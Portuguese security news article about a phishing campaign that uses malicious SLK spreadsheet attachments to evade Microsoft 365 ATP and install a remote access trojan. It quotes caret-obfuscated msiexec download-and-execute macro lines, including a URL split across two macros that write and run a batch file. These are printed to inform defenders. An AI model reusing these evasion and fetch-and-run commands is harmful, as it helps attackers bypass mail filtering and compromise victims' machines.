Os hackers usam um novo método de ataque que ignora a segurança padrão (EOP) e a segurança avançada (ATP) do Microsoft 365.
A campanha de ataque criada especificamente para contornar o Microsoft 365 usa um anexo .slk malicioso que contém uma macro incorporada para baixar e instalar um trojan de acesso remoto.
O ataque foi detectado pelos analistas de segurança da Avanan, de acordo com os analistas “No momento em que este artigo foi escrito, o Microsoft 365 ainda estava vulnerável e o ataque ainda estava sendo usado extensivamente contra clientes do Microsoft 365”.
Clientes do Microsoft 365 direcionados
O “Link Simbólico” (SLK) é um formato de planilha baseado em texto, é um formato de arquivo alternativo ao XLSX. É muito raro alguém receber os arquivos SLK.
Se você recebeu os arquivos em sua caixa de entrada, provavelmente está sendo alvo de um malware Trojan de acesso remoto que foi atualizado para ignorar a Proteção Avançada contra Ameaças.
“O ataque visa especificamente contas do Microsoft 365 e, até recentemente, estava isolado para um pequeno número de organizações”, diz Avanan relatório.
Os invasores usam e-mails altamente customizados para atacar seus alvos, eles são altamente customizados e usam o tópico mais relevante para a organização e o indivíduo visado.
Aqui está o exemplo de e-mail com arquivo SLK anexado
A seguir estão as técnicas de ofuscação usadas para contornar o ATP
- O ataque foi enviado de centenas de contas gratuitas do Hotmail
- O script de macro inclui caracteres ‘^’ para confundir os filtros ATP.
- O URL foi dividido em dois para que o ATP não o lesse como um link da web,
- O servidor de hospedagem tornou-se ativo depois que o e-mail foi enviado, então parecia benigno se fosse colocado em sandbox pelo ATP,
- O servidor de hospedagem respondeu apenas a “Windows Agentes de usuário do instalador”, ignorando outras consultas.
O e-mail foi enviado de milhares de endereços de e-mail do Hotmail, os invasores o usam como uma vantagem para contornar os filtros de segurança.
O script de macro também inclui caracteres de escape para confundir os filtros ATP
M^s^ie^xec /ih^tt^p^:^/^/malicious-site.com/install.php ^/q
Além disso, para confundir o ATP, os invasores dividiram a URL em duas macros
Primeira macro
set /p=””M^s^ie^xec /ih^tt^p^:^/^/sit-malicioso”” > JBfoT.bat
Segunda macro
set /p=””e.com/install.php ^/q”” >> JBfoT.bat & JBfoT.bat
O arquivo SLK malicioso executa dois para criar um script de instalação malicioso que instala software com base em comandos fornecidos por invasores.
Mitigação
Recomenda-se aos usuários que configurem sua conta do Office 365 para rejeitar arquivos SLK, pois eles são relativamente raros.
Você pode nos seguir em Linkedin, Twitter, Facebook para segurança cibernética diária e atualizações de notícias sobre hackers.
Leia também
Novas visualizações de campanha do Microsoft Office 365 para ajudar os clientes a rastrear ataques direcionados à organização e seus usuários
Hackers ignoram a autenticação multifator para hackear contas do Office 365 e G Suite Cloud usando o protocolo IMAP
